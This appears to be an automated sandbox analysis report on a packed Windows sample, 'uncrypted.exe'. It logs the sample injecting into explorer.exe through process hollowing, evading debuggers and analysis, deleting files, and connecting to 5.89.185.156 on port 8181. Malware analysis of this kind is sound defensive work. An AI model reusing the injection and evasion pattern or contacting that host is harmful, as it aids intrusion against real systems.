                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
                    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
                    Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: msi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: winmm.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
                    Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\explorer.exe | Section loaded: webio.dll
                    Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\explorer.exe | Section loaded: napinsp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wshbth.dll
                    Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: winrnr.dll
                    Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
                    Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
                    Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
                    Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mozglue.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: uncrypted.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: uncrypted.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\uncrypted.exe | Unpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack .text:ER;.rsrc:R;.reloc:R;DeaJ6sQm:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;Unknown_Section3:R;
                    Source: C:\Users\user\Desktop\uncrypted.exe | Unpacked PE file: 0.2.uncrypted.exe.9a0000.0.unpack
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: uncrypted.exe | Static PE information: real checksum: 0xdf62039 should be: 0x101254
                    Source: uncrypted.exe | Static PE information: section name: DeaJ6sQm
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A6294 pushfd ; retf 0_2_009A62F8
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A708D pushfd ; retf 0_2_009A70A0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A37B0 pushfd ; retf 0_2_009A37C8
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A48B6 pushfd ; retf 0_2_009A48C4
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A52A9 push edx; retf 0_2_009A52B2
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A5FDA pushfd ; retf 0_2_009A5FF0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A3DDB pushfd ; retf 0_2_009A3DF5
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A89D1 pushfd ; retf 0_2_009A89E0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A39CF pushfd ; retf 0_2_009A39D9
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A4EFE pushfd ; retf 0_2_009A4F6D
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A41F2 pushfd ; retf 0_2_009A420C
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A84E8 pushfd ; retf 0_2_009A84F6
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A67E5 pushfd ; retf 0_2_009A67FB
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A811A pushfd ; retf 0_2_009A8135
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A4618 pushfd ; retf 0_2_009A4626
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A521E push esi; ret 0_2_009A5221
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A7704 pushfd ; retf 0_2_009A7761
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A6C2A pushfd ; retf 0_2_009A6C34
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A7526 pushfd ; retf 0_2_009A753C
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A7B7E pushfd ; retf 0_2_009A7BF8
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A5575 pushfd ; retf 0_2_009A5589
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A4B6F pushfd ; retf 0_2_009A4BBA
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 0_2_009A5967 pushfd ; retf 0_2_009A5975
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004390C3 push esp; ret 2_2_004390CA
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00439887 push esp; ret 2_2_0043988E
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0043993F push esp; ret 2_2_00439946
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004399F3 push esp; ret 2_2_004399FA
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004349BF push esp; ret 2_2_004349C6
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0042C275 push ecx; ret 2_2_0042C288
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00439ADF push esp; ret 2_2_00439AE6
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0043C35C push 840043C3h; ret 2_2_0043C365
                    Source: uncrypted.exe | Static PE information: section name: .text entropy: 7.563976267050098
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E71000 GetCommandLineW,CommandLineToArgvW,ExitProcess,RegGetValueW,ExitProcess,OpenEventW,ExitProcess,SetEvent,CloseHandle,ExitProcess,CreateMutexExW,ExitProcess,CreateEventW,ExitProcess,OpenMutexW,ExitProcess,CreateThread,ExitProcess,WaitForMultipleObjects,WaitForSingleObject,ExitProcess,4_2_00E71000
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E733A0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,wsprintfW,wsprintfW,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,MultiByteToWideChar,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,4_2_00E733A0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E7ADF0 LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree,4_2_00E7ADF0

                    Hooking and other Techniques for Hiding and Protection

                    Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8181
                    Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49704
                    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8181
                    Source: unknown | Network traffic detected: HTTP traffic on port 8181 -> 49705
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: C:\Users\user\Desktop\uncrypted.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079} {5CEDCBBC-554C-4BAE-84C3-3B10F0FEB953}
                    Source: C:\Users\user\Desktop\uncrypted.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\uncrypted.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_2-20726
                    Source: C:\Windows\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\Desktop\uncrypted.exe | API/Special instruction interceptor: Address: 7FF8C88EE814
                    Source: C:\Users\user\Desktop\uncrypted.exe | Memory allocated: 1210000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\uncrypted.exe | Memory allocated: 2D80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\uncrypted.exe | Memory allocated: 4D80000 memory reserve | memory write watch
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011ADE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,3_2_011ADE00
                    Source: C:\Users\user\Desktop\uncrypted.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_3-19003
                    Source: C:\Windows\explorer.exe | Evaded block: after key decision graph_3-18301
                    Source: C:\Users\user\Desktop\uncrypted.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-20973
                    Source: C:\Users\user\Desktop\uncrypted.exe | API coverage: 8.6 %
                    Source: C:\Windows\explorer.exe | API coverage: 8.8 %
                    Source: C:\Users\user\Desktop\uncrypted.exe TID: 3992 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 5468 | Thread sleep time: -36000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 6192 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 4564 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 1352 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0041DB70 WaitForSingleObject,LocalAlloc,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,RemoveDirectoryW,GetLastError,LocalFree,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,2_2_0041DB70
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011997F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,3_2_011997F0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E77EA0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,4_2_00E77EA0
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00E8BAE0 GetSystemInfo,4_2_00E8BAE0
                    Source: C:\Users\user\Desktop\uncrypted.exe | Thread delayed: delay time: 922337203685477
                    Source: explorer.exe, 00000003.00000003.2659448208.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291466574.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0n+
                    Source: explorer.exe, 00000003.00000002.3291325405.0000000000F48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP`
                    Source: explorer.exe, 00000003.00000003.2659448208.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291466574.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083946738.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084613311.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: uncrypted.exe, 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2062607921.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\uncrypted.exe | API call chain: ExitProcess graph end node graph_2-19733
                    Source: C:\Users\user\Desktop\uncrypted.exe | API call chain: ExitProcess graph end node graph_2-19805
                    Source: C:\Users\user\Desktop\uncrypted.exe | API call chain: ExitProcess graph end node graph_2-19750
                    Source: C:\Users\user\Desktop\uncrypted.exe | API call chain: ExitProcess graph end node graph_2-19747
                    Source: C:\Users\user\Desktop\uncrypted.exe | API call chain: ExitProcess graph end node graph_2-19808
                    Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node graph_3-18818
                    Source: C:\Windows\explorer.exe | API call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004290CF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004290CF
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011ADE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,3_2_011ADE00
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00419140 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00419140
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_00405710 GetCurrentProcess,IsWow64Process,GetProcessHeap,2_2_00405710
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004290CF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004290CF
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_004281E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004281E1
                    Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0042BA20 SetUnhandledExceptionFilter,2_2_0042BA20
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BA818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_011BA818
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BE5B8 SetUnhandledExceptionFilter,3_2_011BE5B8
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011BC5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_011BC5E0
                    Source: C:\Windows\explorer.exe | Code function: 3_2_011C0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_011C0E94
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F35780 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F35780
                    Source: C:\Windows\explorer.exe | Code function: 4_2_00F32970 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00F32970
                    Source: C:\Users\user\Desktop\uncrypted.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\explorer.exeNetwork Connect: 5.89.185.156 8181Jump to behavior
                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 4 + 4, ref buffer, 4, ref bytesRead)
                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
                    Source: 0.2.uncrypted.exe.3e07fa0.5.raw.unpack, RunPE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 3_2_011943D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,3_2_011943D0
                    Source: C:\Windows\explorer.exeCode function: 3_2_011942E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,3_2_011942E0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119A3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,3_2_0119A3B0
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Users\user\Desktop\uncrypted.exe "C:\Users\user\Desktop\uncrypted.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\uncrypted.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119ECE0 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,3_2_0119ECE0
                    Source: C:\Windows\explorer.exeCode function: 3_2_0119ECE0 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,3_2_0119ECE0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,2_2_00420800
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_004208A0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,GetTickCount,___crtGetLocaleInfoEx,Sleep,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,CloseHandle,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,2_2_00422100
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,2_2_00418119
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,2_2_00418132
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WaitForSingleObject,CloseHandle,2_2_00421A20
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420AB0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420CE0
